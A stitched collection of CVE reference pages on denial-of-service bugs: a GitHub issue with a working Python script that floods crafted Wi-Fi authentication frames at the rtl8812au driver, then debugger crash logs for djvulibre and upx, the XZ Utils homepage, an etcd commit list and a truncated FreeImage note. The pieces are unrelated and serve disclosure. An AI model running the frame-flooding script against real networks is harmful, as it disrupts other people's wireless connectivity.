An issue was discovered in function nl80211_send_chandef in rtl8812au v5.6.4.2 allows attackers to cause a denial of service.

**testing environment**  
root@kali:~# uname -r  
5.6.0-kali2-amd64

**poc:**  
\`

#!/usr/bin/env python  
#coding=utf-8  
import time  
import socket

AP\_MAC = "00:22:66:88:22:00"  
STA\_MAC = "00:13:ef:f1:04:ef"  
ETH\_P\_ALL = 3  
IFACE = "wlan0"

def mac2str(mac):  
return "".join(map(lambda x: chr(int(x, 16)), mac.split(":")))

RADIO = "\\x00"  
RADIO += "\\x00"  
RADIO += "\\x24\\x00"  
RADIO += "\\x2f\\x40\\x00\\xa0"  
RADIO += "\\x20\\x08\\x00\\x00"  
RADIO += "\\x00\\x00\\x00\\x00"  
RADIO += "\\x27"  
RADIO += "\\x43"  
RADIO += "\\x6e\\x25"  
RADIO += "\\xa0\\x00"  
RADIO += "\\x00\\x00"  
RADIO += "\\x10\\x02"  
RADIO += "\\x6c\\x09"  
RADIO += "\\xa0\\x00"  
RADIO += "\\xd0\\x00"  
RADIO += "\\x00"  
RADIO += "\\x00"  
RADIO += "\\xd0"  
RADIO += "\\x00"

AUTH\_REQ\_OPEN = RADIO + "\\xB0" # Type/Subtype  
AUTH\_REQ\_OPEN += "\\x08" # Flags  
AUTH\_REQ\_OPEN += "\\xc3\\x50" # Duration ID  
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # Desti8nation address  
AUTH\_REQ\_OPEN += mac2str(STA\_MAC) # Source address  
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # BSSID  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Sequence control  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication algorithm (open)  
AUTH\_REQ\_OPEN += "\\x01\\x00" # Authentication sequence number  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication status  
AUTH\_REQ\_OPEN += "\\x1f\\xd8" # Authentication status  
AUTH\_REQ\_OPEN += "\\x5a\\x07" # Authentication status  
AUTH\_REQ\_HDR = AUTH\_REQ\_OPEN\[:-6\]

def start\_fuzz():  
s = socket.socket(socket.AF\_PACKET, socket.SOCK\_RAW, socket.htons(ETH\_P\_ALL))  
s.bind((IFACE, ETH\_P\_ALL))  
while True:  
print("send msg:",AUTH\_REQ\_OPEN)  
s.send(AUTH\_REQ\_OPEN)

def main():  
start\_fuzz()

if **name** == "**main**":  
main()  
\`  
when execute poc, we should turn on monitoring mode：  
ip link set wlan0 down  
iw dev wlan0 set type monitor  
ip link set wlan0 up

**result**

[  952.607304] WARNING: CPU: 0 PID: 1293 at net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] [  952.607304] Modules linked in: nfnetlink_queue(E) nfnetlink_log(E) 88XXau(OE) nfnetlink(E) bluetooth(E) drbg(E) ansi_cprng(E) ecdh_generic(E) ecc(E) cfg80211(E) rfkill(E) vsock_loopback(E) vmw_vsock_virtio_transport_common(E) vmw_vsock_vmci_transport(E) vsock(E) intel_rapl_msr(E) intel_rapl_common(E) intel_rapl_perf(E) vmw_balloon(E) joydev(E) serio_raw(E) pcspkr(E) sg(E) vmw_vmci(E) evdev(E) ac(E) binfmt_misc(E) fuse(E) sunrpc(E) ip_tables(E) x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) crc32c_generic(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) crct10dif_pclmul(E) crct10dif_common(E) crc32_pclmul(E) crc32c_intel(E) ghash_clmulni_intel(E) hid_generic(E) usbhid(E) hid(E) sr_mod(E) cdrom(E) ata_generic(E) vmwgfx(E) aesni_intel(E) libaes(E) crypto_simd(E) cryptd(E) glue_helper(E) ttm(E) psmouse(E) drm_kms_helper(E) ata_piix(E) cec(E) uhci_hcd(E) ehci_pci(E) xhci_pci(E) xhci_hcd(E) e1000(E) ehci_hcd(E) usbcore(E) usb_common(E) mptspi(E) mptscsih(E) mptbase(E) [  952.607325]  scsi_transport_spi(E) drm(E) libata(E) i2c_piix4(E) scsi_mod(E) button(E) [  952.607329] CPU: 0 PID: 1293 Comm: RTW_CMD_THREAD Tainted: G           OE     5.6.0-kali2-amd64 #1 Debian 5.6.14-1kali1 [  952.607330] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/29/2019 [  952.607340] RIP: 0010:nl80211_send_chandef+0x14b/0x160 [cfg80211] [  952.607341] Code: 00 00 be a1 00 00 00 48 89 ef 89 44 24 04 e8 7c 8a 07 d6 85 c0 0f 84 7b ff ff ff 41 bc 97 ff ff ff e9 70 ff ff ff 31 c0 eb a7 <0f> 0b 41 bc ea ff ff ff e9 5f ff ff ff e8 c3 c7 cb d5 0f 1f 00 0f [  952.607342] RSP: 0018:ffffa687c088fd80 EFLAGS: 00010246 [  952.607343] RAX: 0000000000000000 RBX: ffffa687c088fe08 RCX: 0000000000000087 [  952.607343] RDX: 00000000c07597ec RSI: 00000000ffff259c RDI: ffffa687c088fe08 [  952.607344] RBP: ffff98e22da4dd00 R08: 0000000000000003 R09: 0000000000000004 [  952.607344] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa687c088fe08 [  952.607344] R13: 0000000000000000 R14: ffff98e22da4dd00 R15: ffff98e2343a3014 [  952.607345] FS:  0000000000000000(0000) GS:ffff98e23be00000(0000) knlGS:0000000000000000 [  952.607346] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [  952.607346] CR2: 00007f9224153030 CR3: 000000007a080005 CR4: 00000000002606f0 [  952.607365] Call Trace: [  952.607395]  nl80211_ch_switch_notify.constprop.0+0xcd/0x170 [cfg80211] [  952.607424]  rtw_cfg80211_ch_switch_notify+0x138/0x147 [88XXau] [  952.607440]  ? rtw_chk_start_clnt_join+0x79/0x79 [88XXau] [  952.607454]  rtw_chk_start_clnt_join+0x72/0x79 [88XXau] [  952.607468]  join_cmd_hdl+0x267/0x373 [88XXau] [  952.607476]  rtw_cmd_thread+0x295/0x3ed [88XXau] [  952.607494]  kthread+0xf9/0x130 [  952.607504]  ? rtw_stop_cmd_thread+0x39/0x39 [88XXau] [  952.607506]  ? kthread_park+0x90/0x90 [  952.607521]  ret_from_fork+0x35/0x40 [  952.607524] ---[ end trace c0d1960d55eb317c ]---

CVE-2020-26652: fuzzing wifi ,network will down,  result is net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] · Issue #730 · aircrack-ng/rtl8812au

An issue discovered in XZ 5.2.5 allows attackers to cause a denial of service via decompression of crafted file.

XZ Utils is free general-purpose data compression software with a high compression ratio. XZ Utils were written for POSIX-like systems, but also work on some not-so-POSIX systems. XZ Utils are the successor to LZMA Utils.

The core of the XZ Utils compression code is based on LZMA SDK, but it has been modified quite a lot to be suitable for XZ Utils. The primary compression algorithm is currently LZMA2, which is used inside the .xz container format. With typical files, XZ Utils create 30 % smaller output than gzip and 15 % smaller output than bzip2.

XZ Utils consist of several components:

*   liblzma is a compression library with an API similar to that of zlib.
*   xz is a command line tool with syntax similar to that of gzip.
*   xzdec is a decompression-only tool smaller than the full-featured xz tool.
*   A set of shell scripts (xzgrep, xzdiff, etc.) have been adapted from gzip to ease viewing, grepping, and comparing compressed files.
*   Emulation of command line tools of LZMA Utils eases transition from LZMA Utils to XZ Utils.

While liblzma has a zlib-like API, liblzma doesn't include any file I/O functions. A separate I/O library is planned, which would abstract handling of .gz, .bz2, and .xz files with an easy to use API.

**Documentation**

Man page with a keyword index: xz(1)

Doxygen-generated liblzma API documentation is also included in the source packages since XZ Utils 5.4.2.

**Source code**

Versions 5.2.12, 5.4.3, and later have been signed with Jia Tan's OpenPGP key. The older files have been signed with Lasse Collin's OpenPGP key.

See the NEWS file for a summary of changes between versions.

**Stable**

5.4.4 was released on 2023-08-02. A minor bug fix release 5.2.12 to the old stable branch was made on 2023-05-04. This is probably the last release in the 5.2.x series.

XZ Utils releases are hosted on GitHub and thus some of the links below redirect to the XZ Utils release section on GitHub. Release files are also available in the XZ Utils files section on Sourceforge.

xz-5.4.4.tar.gz (2808 KiB) signature  
xz-5.4.4.tar.bz2 (2116 KiB) signature  
xz-5.4.4.tar.zst (1680 KiB) signature  
xz-5.4.4.tar.xz (1623 KiB) signature

Probably the last release of the old stable branch:

xz-5.2.12.tar.gz (2140 KiB) signature  
xz-5.2.12.tar.bz2 (1593 KiB) signature  
xz-5.2.12.tar.zst (1317 KiB) signature  
xz-5.2.12.tar.xz (1275 KiB) signature

**Development**

The new APIs, command line options etc. in development releases should be considered unstable. Incompatible changes to unstable features may be done before they get included in a stable release.

There currently are no development releases.

**Old versions**

Source and binary packages of old XZ Utils releases are available on a separate page.

**Git repository**

The primary repository is on GitHub:

git clone https://github.com/tukaani-project/xz

It is mirrored with some delay to git.tukaani.org:

git clone https://git.tukaani.org/xz.git

Gitweb

Branches:

*   **master**: the latest development code
*   **v5.4**: fixes for the next 5.4.x release
*   **v5.2**: fixes for the next 5.2.x release
*   **v5.0**: fixes for the next 5.0.x release (unmaintained)

Building the code from the git repository requires GNU Autotools. Here are the _minimum_ versions that should work with XZ Utils; using the latest versions is strongly recommended:

*   Autoconf 2.69
*   Automake 1.12
*   gettext 0.19.6 (Note: autopoint depends on cvs!)
*   Libtool 2.4

The following are optional dependencies. The autogen.sh script will fail if they are missing but autogen.sh takes command line arguments to disable these dependencies.

*   po4a is needed for translated documentation (man pages). To build without po4a, use --no-po4a with autogen.sh.
*   Doxygen is needed to generate liblzma API documentation. To build without Doxygen, use --no-doxygen with autogen.sh.

**Security issues****xzgrep CVE-2022-1271, ZDI-CAN-16587**

A patch to fix a security vulnerability in xzgrep (CVE-2022-1271, ZDI-CAN-16587) was made public on 2022-04-07. The patch applies to 4.999.9beta to 5.2.5, 5.3.1alpha, and 5.3.2alpha. Newer XZ Utils releases include an improved fix for the problem.

It is a severe issue if an attacker can control the filenames that are given on the xzgrep command line. The vulnerability was discovered by cleemy desu wayo working with Trend Micro Zero Day Initiative. For more information, see the detailed description in the patch file linked below.

xzgrep-ZDI-CAN-16587.patch  
xzgrep-ZDI-CAN-16587.patch.sig

**Bindings****Python**

Python 3.3 includes bindings for liblzma. A backport of these bindings are available for Python 2 in the backports.lzma package.

lzmaffi is another Python binding which adds random-access decompression support.

The original Python 2 binding for liblzma is PylibLZMA.

**Perl**

Perl bindings for liblzma: IO-Compress-Lzma and Compress-Raw-Lzma.

**Haskell**

Haskell bindings.

**Delphi and Free Pascal**

Bindings and example programs for Delphi and Free Pascal are available here.

**Pre-built binaries**

Many free software operating systems already provide easy-to-install XZ Utils binaries. It doesn't make sense to provide links to all those here. Instead, binaries or links to websites providing binaries are listed here only for operating systems that don't have well-known repositories where users would get software like this.

If you have a website that provides up-to-date XZ Utils binaries for an operating system that meets the the criteria above, let me know and I will include a link here. Note that I won't host the binaries themselves without a good reason.

**Windows**

The Windows version of XZ Utils includes binaries for 32-bit and 64-bit x86. The binaries only depend on msvcrt.dll, which is available on Windows 98 and later out of the box.

*   Command line tools: xz, xzdec, lzmadec, lzmainfo
*   Shared (DLL) and static liblzma, required C header files, and liblzma.def to create import libraries for non-GNU toolchains (no import library is needed with GNU toolchain)
*   Documentation is in plain text (UTF-8) format. The man pages of the command line tools are included also as PDF.

5.2.10, 5.2.11, or 5.2.12 do not have anything significant for Windows so only 5.2.9 is here. 5.4.x builds are not provided for now.

xz-5.2.9-windows.zip (1473 KiB) signature  
xz-5.2.9-windows.7z (708 KiB) signature

**DOS**

The DOS version of XZ Utils includes only the xz command line tool and some documentation. The xz tool should work e.g. on FreeDOS (also in DOSEMU), MS-DOS, and Windows 95/98/98SE/ME. This doesn't necessarily work in DOSBox at all, and at least some problems are expected under Windows XP Command Prompt (signal handling doesn't work).

Since the DOS version is naturally going to get very little testing, it is recommended to use the Windows version instead of the DOS version if you need xz under Windows 98 or later. It is likely that that the DOS version will be updated only occasionally.

5.2.0 and later have experimental support for 8.3 filenames. See xz-dos.txt in the binary package or dos/README.txt in the source package for details.

xz-5.4.0-dos.zip (277 KiB) signature

The package includes some copylefted code from DJGPP and CWSDPMI. The relevant source code is available from their home pages, and copies are also available below.

djlsr205.zip (2000 KiB)  
djtst205.zip (1061 KiB)  
csdpmi7s.zip (88 KiB)

Juan Manuel Guerrero has made a more complete port of XZ Utils to DOS. It also has support for short file names (8.3), but the naming method is different from the one found in 5.2.0 and later. It is available from DJGPP mirrors under /current/v2apps (e.g. xz-500b.zip for 5.0.0 binaries).

**Supported platforms**

Below is an incomplete and somewhat vague (version numbers mostly missing) list of operating systems on which XZ Utils should work. The compiler(s) or toolchains are mentioned in parenthesis. GCC refers to GCC 3 or later. If you have additions or corrections, please email them to me.

*   GNU/Linux (GCC, Clang, ICC, IBM XL C)
*   GNU/HURD (GCC)
*   DragonflyBSD (GCC)
*   FreeBSD (GCC, Clang)
*   MirBSD (GCC)
*   NetBSD (GCC)
*   OpenBSD (Clang, GCC)
*   MINIX 3 (GCC) \[1\]
*   Haiku (GCC4)
*   Mac OS X (GCC)
*   Solaris 8, 9, 10, 11 (GCC, Sun Studio) \[3\]
*   Solaris 2.6, 7 (GCC)
*   HP-UX (GCC, HP ANSI C) \[2\]
*   Tru64 (GCC, Compaq C compiler) \[1\]
*   IRIX (MIPSpro) \[1\]
*   AIX (GCC, IBM XL C)
*   z/OS (IBM XL C)
*   QNX (compilers?)
*   OpenVMS (HP C compiler) \[1\]
*   OpenVOS 17 (GCC)
*   SCO OpenServer 5.0.7 (GCC 3.4.6, 4.2.4) \[4\]
*   Windows 95 and later (GCC/MinGW, GCC/MinGW-w64, GCC/Cygwin, GCC/Interix, Visual Studio (VS can only build liblzma)) \[1\]
*   OS/2, eComStation (GCC)
*   DOS e.g. FreeDOS and MS-DOS (GCC/DJGPP) \[1\]

\[1\] See also the platform-specific notes in the INSTALL file.

\[2\] 2010-09-22: HP ANSI C compiler crashes when compiling XZ Utils on PA-RISC. On Itanium there are no problems.

\[3\] On Solaris 8 and 9 one may need to pass ac\_cv\_prog\_cc\_c99= to configure if using Sun Studio.

\[4\] Use --disable-threads when running configure.

**Licensing**

The most interesting parts of XZ Utils (e.g. liblzma) are in the public domain. You can do whatever you want with the public domain parts.

Some parts of XZ Utils (e.g. build system and some utilities) are under different free software licenses such as GNU LGPLv2.1, GNU GPLv2, or GNU GPLv3.

See the file COPYING for more details.

CVE-2020-22916: XZ Utils

Buffer Overflow vulnerability in hash_findi function in hashtbl.c in nasm 2.15rc0 allows remote attackers to cause a denial of service via crafted asm file.

Self-registration is disabled due to spam issue (mail gorcunov@gmail.com or hpa@zytor.com to create an account)

'3392644?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-21685: Invalid Bug ID

Buffer Overflow vulnerability in scan function in stdscan.c in nasm 2.15rc0 allows remote attackers to cause a denial of service via crafted asm file.

Self-registration is disabled due to spam issue (mail gorcunov@gmail.com or hpa@zytor.com to create an account)

'3392645?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-21687: Invalid Bug ID

An issue was discovered IW44Image.cpp in djvulibre 3.5.28 in allows attackers to cause a denial of service via divide by zero.

Divide By Zero in djvulibre-3.5.28/libdjvu/IW44Image.cpp  
Command: djvups POC  
Result:floating point exception  
Bt:  
Thread 4 "djvups" received signal SIGFPE, Arithmetic exception.  
\[Switching to Thread 0x7ffff6926700 (LWP 2411925)\]  
0x000055555563bbdf in DJVU::IW44Image::Map::image (this=0x7fffe8001640, img8=0x0, rowsize=0, pixsep=3, fast=0) at IW44Image.cpp:679  
679 if (sz / (size\_t)bw != (size\_t)bh) // multiplication overflow  
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA  
──────────────────────────────────────────────────────────────────────────────────────────────────\[ REGISTERS \]──────────────────────────────────────────────────────────────────────────────────────────────────  
RAX 0x0  
RBX 0x10  
RCX 0x0  
RDX 0x0  
RDI 0x7fffe8001640 —▸ 0x7fffe8001ba0 —▸ 0x7fffe80019d0 —▸ 0x7fffe8001440 —▸ 0x7fffe8001390 ◂— ...  
RSI 0x20  
R8 0x0  
R9 0x5555556b6c40 (stdout@@GLIBC\_2.2.5) —▸ 0x7ffff7bb56a0 (_IO\_2\_1\_stdout_) ◂— 0xfbad2a84  
R10 0xa  
R11 0x7fffe8000080 —▸ 0x7fffe80028f0 ◂— 0x0  
R12 0x7ffff6925bc0 ◂— 0x0  
R13 0x7fffec001030 —▸ 0x5555556b3898 —▸ 0x55555563ac40 (DJVU::IWPixmap::~IWPixmap()) ◂— endbr64  
R14 0x0  
R15 0x0  
RBP 0x0  
RSP 0x7ffff69252a0 ◂— 0x300000000  
RIP 0x55555563bbdf ◂— div rcx  
───────────────────────────────────────────────────────────────────────────────────────────────────\[ DISASM \]────────────────────────────────────────────────────────────────────────────────────────────────────  
► 0x55555563bbdf div rcx  
↓  
0x55555563bbdf div rcx

────────────────────────────────────────────────────────────────────────────────────────────────\[ SOURCE (CODE) \]────────────────────────────────────────────────────────────────────────────────────────────────  
In file: /home/zxq/CVE\_testing/source/djvulibre-3.5.28/libdjvu/IW44Image.cpp  
674 IW44Image::Map::image(signed char _img8, int rowsize, int pixsep, int fast)  
675 {  
676 // Allocate reconstruction buffer  
677 short_ data16;  
678 size\_t sz = bw \* bh;  
► 679 if (sz / (size\_t)bw != (size\_t)bh) // multiplication overflow  
680 G\_THROW("IW44Image: image size exceeds maximum (corrupted file?)");  
681 GPBuffer<short> gdata16(data16,sz);  
682 // Copy coefficients  
683 int i;  
684 short _p = data16;  
────────────────────────────────────────────────────────────────────────────────────────────────────\[ STACK \]────────────────────────────────────────────────────────────────────────────────────────────────────  
00:0000│ rsp 0x7ffff69252a0 ◂— 0x300000000  
01:0008│ 0x7ffff69252a8 ◂— 0x0  
02:0010│ 0x7ffff69252b0 ◂— 0x0  
03:0018│ 0x7ffff69252b8 —▸ 0x7fffe80019d0 —▸ 0x7fffe8001440 —▸ 0x7fffe8001390 —▸ 0x7fffe8001110 ◂— ...  
04:0020│ 0x7ffff69252c0 —▸ 0x7ffff6925310 ◂— 0x6600000001  
05:0028│ 0x7ffff69252c8 ◂— 0x0  
06:0030│ 0x7ffff69252d0 ◂— 0x4200000000000000  
07:0038│ 0x7ffff69252d8 ◂— 0x4  
──────────────────────────────────────────────────────────────────────────────────────────────────\[ BACKTRACE \]──────────────────────────────────────────────────────────────────────────────────────────────────  
► f 0 0x55555563bbdf  
f 1 0x55555563c28b DJVU::IWPixmap::get\_pixmap()+155  
f 2 0x5555555d33b7  
f 3 0x5555555d42da  
f 4 0x5555555d4978 DJVU::DjVuFile::decode\_func()+200  
f 5 0x5555555d4b65 DJVU::DjVuFile::static\_decode\_func(void_)+69  
f 6 0x555555621bb9 DJVU::GThread::start(void\*)+57  
f 7 0x7ffff7f10609 start\_thread+217  
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────  
pwndbg> p bw  
$1 = 0</short>

CVE-2021-46310: DjVuLibre / Bugs / #345 Divide By Zero in djvulibre-3.5.28/libdjvu/IW44Image.cpp

An issue was discovered IW44EncodeCodec.cpp in djvulibre 3.5.28 in allows attackers to cause a denial of service via divide by zero.

Command：c44 POC  
Result：  
gdb information：floating point exception  
Program received signal SIGFPE, Arithmetic exception.  
0x00005555555afe13 in DJVU::IWBitmap::Encode::init (this=0x5555555fb1f0, bm=..., gmask=...) at IW44EncodeCodec.cpp:1431  
1431 bconv\[i\] = max(0,min(255,i\*255/g)) - 128;  
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA  
──────────────────────────────────────────────────────────────────────────────────────────────────\[ REGISTERS \]──────────────────────────────────────────────────────────────────────────────────────────────────  
RAX 0x0  
RBX 0x0  
RCX 0x0  
RDX 0x0  
RDI 0x0  
RSI 0x7fffffffdfc0 ◂— 0x0  
R8 0xff  
R9 0x0  
R10 0x1  
R11 0x246  
R12 0x0  
R13 0x7fffffffe110 ◂— 0x0  
R14 0x0  
R15 0x18  
RBP 0x5555555fb2f0 —▸ 0x5555555e1ab8 —▸ 0x55555557aa50 (DJVU::GBitmap::~GBitmap()) ◂— endbr64  
RSP 0x7fffffffdf70 —▸ 0x7fffffffe170 —▸ 0x5555555faf50 —▸ 0x5555555e1880 —▸ 0x55555556f0e0 (DJVU::MemoryMapByteStream::~MemoryMapByteStream()) ◂— ...  
RIP 0x5555555afe13 ◂— idiv r14d  
───────────────────────────────────────────────────────────────────────────────────────────────────\[ DISASM \]────────────────────────────────────────────────────────────────────────────────────────────────────  
► 0x5555555afe13 idiv r14d  
↓  
0x5555555afe13 idiv r14d

────────────────────────────────────────────────────────────────────────────────────────────────\[ SOURCE (CODE) \]────────────────────────────────────────────────────────────────────────────────────────────────  
In file: /home/zxq/CVE\_testing/source/djvulibre-3.5.28/libdjvu/IW44EncodeCodec.cpp  
1426 signed char _buffer;  
1427 GPBuffer<signed char=""> gbuffer(buffer,w</signed>_h);  
1428 // Prepare gray level conversion table  
1429 signed char bconv\[256\];  
1430 for (i=0; i<256; i++)  
► 1431 bconv\[i\] = max(0,min(255,i_255/g)) - 128;  
1432 // Perform decomposition  
1433 // Prepare mask information  
1434 const signed char_ msk8 = 0;  
1435 int mskrowsize = 0;  
1436 GBitmap \*mask=gmask;  
────────────────────────────────────────────────────────────────────────────────────────────────────\[ STACK \]────────────────────────────────────────────────────────────────────────────────────────────────────  
00:0000│ rsp 0x7fffffffdf70 —▸ 0x7fffffffe170 —▸ 0x5555555faf50 —▸ 0x5555555e1880 —▸ 0x55555556f0e0 (DJVU::MemoryMapByteStream::~MemoryMapByteStream()) ◂— ...  
01:0008│ 0x7fffffffdf78 ◂— 0x2f8559fd8e9bfc00  
02:0010│ 0x7fffffffdf80 —▸ 0x5555555fb1f0 —▸ 0x5555555e25b8 —▸ 0x5555555afb40 (DJVU::IWBitmap::Encode::~Encode()) ◂— endbr64  
03:0018│ 0x7fffffffdf88 ◂— 0x0  
04:0020│ 0x7fffffffdf90 —▸ 0x7fffffffdfb0 —▸ 0x7fffffffdfa8 ◂— 0x0  
05:0028│ 0x7fffffffdf98 —▸ 0x7fffffffe050 —▸ 0x5555555e1b00 (DJVU::GCont::TrivTraits<1>::traits()::theTraits) ◂— 0x1  
06:0030│ 0x7fffffffdfa0 —▸ 0x55555557f820 ◂— endbr64  
07:0038│ 0x7fffffffdfa8 ◂— 0x0  
──────────────────────────────────────────────────────────────────────────────────────────────────\[ BACKTRACE \]──────────────────────────────────────────────────────────────────────────────────────────────────  
► f 0 0x5555555afe13  
f 1 0x5555555b00a4  
f 2 0x55555556ba02 main+1986  
f 3 0x7ffff79f00b3 \_\_libc\_start\_main+243  
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────  
pwndbg> pg  
Undefined command: "pg". Try "help".  
pwndbg> p g  
$1 = 0

CVE-2021-46312: DjVuLibre / Bugs / #344 Divide By Zero in djvulibre-3.5.28/libdjvu/IW44EncodeCodec.cpp

Etcd v3.5.4 allows remote attackers to cause a denial of service via function PageWriter.write in pagewriter.go

fix(pkg/ioutil):avoid panic in PageWriter.Write() when pageBytes is 0

fix(pkg/ioutil): Trigger a panic when pageBytes is illegal in NewPateWriter

update(Test pkg/ioutil):Update TestPageWriterPageBytes

migrate e2e & integration role\_test to common

tests: Migrate Txn tests to common functional test framework

provide a generic assert function

server: Director can be stopped

Goroutine for new directors would live past director scope. Tests
could occassionally fail if this goroutine had log events after
test execution should have ended.

server: Add director interrupt handler

Director's goroutine would not be properly stopped in a non-test
scenario. Handler stops it when process is interrupted.

server: Move director interrupt handler to method

server: Don't register director interrupt handler

remove v2 http proxy in 3.6

tests: Extract cluster test cases

tests: Refactor spawn json command

hide the revision field when it isn't populated

tests: Make common framework context aware

Documentation: Publish v3.5 data inconsistency postmortem

scripts: Avoid additional repo clone

This PR removes additional clone when building artifacts.

When releasing v3.5.4 this clone was main cause of issues and
confusion about what release script is doing.

release.sh script already clones repo in /tmp/ directory, so clonning
before build is not needed. As precautions for bug in script leaving
/tmp/ clone in bad state  I moved "Verify the latest commit has the
version tag" and added "Verify the clean working tree" to be always run
before build.

scripts: Detect staged files before building release

fix a typo: print the correct error info

Governance: Use lazy consensus when needed to make decision

In lack of supermajority, we sometimes required to hold on to
important decisions for long time. In order to speed up, after
giving enough time for supermajority, use lazy consensus.

Encapsulation of applier logic: Move Txn related code out of applier.go.

The PR removes calls to applierV3base logic from server.go that is NOT part of 'application'.
The original idea was that read-only transaction and Range call shared logic with Apply,
so they can call appliers directly (but bypassing all 'corrupt', 'quota' and 'auth' wrappers).

This PR moves all the logic to a separate file (that later can become package on its own).

Encapsulating applier logic: UberApplier coordinates all appliers for server

This PR:
 - moves wrapping of appliers (due to Alarms) out of server.go into uber\_applier.go
 - clearly devides the application logic into: chain of:
     a) 'WrapApply' (generic logic across all the methods)
     b) dispatcher (translation of Apply into specific method like 'Put')
     c) chain of 'wrappers' of the specific methods (like Put).
 - when we do recovery (restore from snapshot) we create new instance of appliers.

The purpose is to make sure we control all the depencies of the apply process, i.e.
we can supply e.g. special instance of 'backend' to the application logic.

Marge applierV3Internal into applierV3 interface

Rename EtcdServer.Id with EtcdServer.MemberId.

It was misleading and error prone vs. ClusterId.

Applier does not depend on EtcdServer any longer.

All the depencies are explicily passed to the UberApplier factory method.

Move server/etcdserver/txn.go to new package: server/etcdserver/txn

Move etcdserver/errors.go to sepatate package to avoid cyclic dependencies.

Move apply to its own package (no dependency on etcdserver).

Apply encapsulation: Cleanup metrics reporting.

Side effect: applySec(0.4s) used to be reported as 0s, now it's correctly 0.4s.

Simplify imports and improve comments.

Move CheckTxnAuth to txn.

Rename package alising "apply2" -> apply.

Rename etcdserver/etcderrors package to etcdserver/errors.

expose UberApplier as interface (not as implementation struct).

Rename the txn, so as not to be the same as the package name.

Fixing missing comment on the dispatch() function.

Rename WrapApply to Apply.

Remove unused code and apply code-quality suggestions.

use go install instead of go get

feat(pkg/ioutil): verify.Assert is introduced into NewPageWritter

add etcd tool binaries into .gitignore

CVE-2022-34038: fix(pkg/ioutil):avoid panic in PageWriter.Write() when pageBytes is 0 by secsys-go · Pull Request #14022 · etcd-io/etcd

The libcpu component which is used by libasm of elfutils version 0.177 (git 47780c9e), suffers from denial-of-service vulnerability caused by application crashes due to out-of-bounds write (CWE-787), off-by-one error (CWE-193) and reachable assertion (CWE-617); to exploit the vulnerability, the attackers need to craft certain ELF files which bypass the missing bound checks.

CVE-2020-21047

Reachable Assertion vulnerability in upx before 4.0.0 allows attackers to cause a denial of service via crafted file passed to the the readx function.

**What's the problem (or question)?**

Assertion \`(unsigned)len <= buf->getSize()' failed in file.cpp:275

upx.out: file.cpp:275: virtual int InputFile::readx(MemBuffer\*, int): Assertion \`(unsigned)len <= buf\-\>getSize()' failed.
Program received signal SIGABRT, Aborted.

    pwndbg> bt
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff7bcc859 in __GI_abort () at abort.c:79
    #2  0x00007ffff7bcc729 in __assert_fail_base (fmt=0x7ffff7d62588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x5555555f5618 "(unsigned)len <= buf->getSize()", file=0x5555557067b1 "file.cpp", line=275, function=<optimized out>) at assert.c:92
    #3  0x00007ffff7bddf36 in __GI___assert_fail (assertion=0x5555555f5618 "(unsigned)len <= buf->getSize()", file=0x5555557067b1 "file.cpp", line=275, function=0x5555555f5638 "virtual int InputFile::readx(MemBuffer*, int)") at assert.c:101
    #4  0x000055555558a280 in InputFile::readx(MemBuffer*, int) ()
    #5  0x00005555555c5969 in PackUnix::packExtent(PackUnix::Extent const&, Filter*, OutputFile*, unsigned int, unsigned int) ()
    #6  0x00005555555b4fb2 in PackMachBase<N_Mach::MachClass_64<N_BELE_CTP::LEPolicy> >::pack2(OutputFile*, Filter&) ()
    #7  0x00005555555c4d98 in PackUnix::pack(OutputFile*) ()
    #8  0x00005555555d6028 in Packer::doPack(OutputFile*) ()
    #9  0x00005555555eacd3 in do_one_file(char const*, char*) ()
    #10 0x00005555555eaf8f in do_files(int, int, char**) ()
    #11 0x00005555555973c7 in upx_main(int, char**) ()
    #12 0x000055555557c4e2 in main ()
    #13 0x00007ffff7bce0b3 in __libc_start_main (main=0x55555557c3e0 <main>, argc=2, argv=0x7fffffffe208, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1f8) at ../csu/libc-start.c:308
    #14 0x000055555557c5fe in _start ()
    

**What should have happened?**

No crash.

**Do you have an idea for a solution?**

No.

**How can we reproduce the issue?**

1.make  
2../src/upx.out ./poc  
poc.zip

**Please tell us details about your environment.**

*   ./upx.out --version  
    upx 4.0.0-git-5d1347a359bb  
    UCL data compression library 1.03  
    zlib data compression library 1.2.11  
    LZMA SDK version 4.43
*   Host Operating System and version: Ubuntu 20.04 focal
*   Host CPU architecture: AMD E  
    poc.zip  
    PYC 7742 64-Core @ 16x 2.25GHz
*   Target Operating System and version: Ubuntu 20.04 focal
*   Target CPU architecture: AMD EPYC 7742 64-Core @ 16x 2.25GHz

CVE-2021-46179: Assertion `(unsigned)len <= buf->getSize()' failed in file.cpp:275 · Issue #545 · upx/upx

FreeImage before 1.18.0, ReadPalette function in PluginTIFF.cpp is vulnerabile to null pointer dereference.

> tl;dr:  
> When Load TIFF format files, "bitspersample" and "samplesperpixel" are read from file. If the variable biBitCount < 16 witch calc by "bitspersample" and "samplesperpixel", FreeImage will try to write nullptr.

When the program reads a TIFF format file, it will be handed to the Load() function of the 'PluginTIFF.cpp' file. And it will call ReadPalette().  
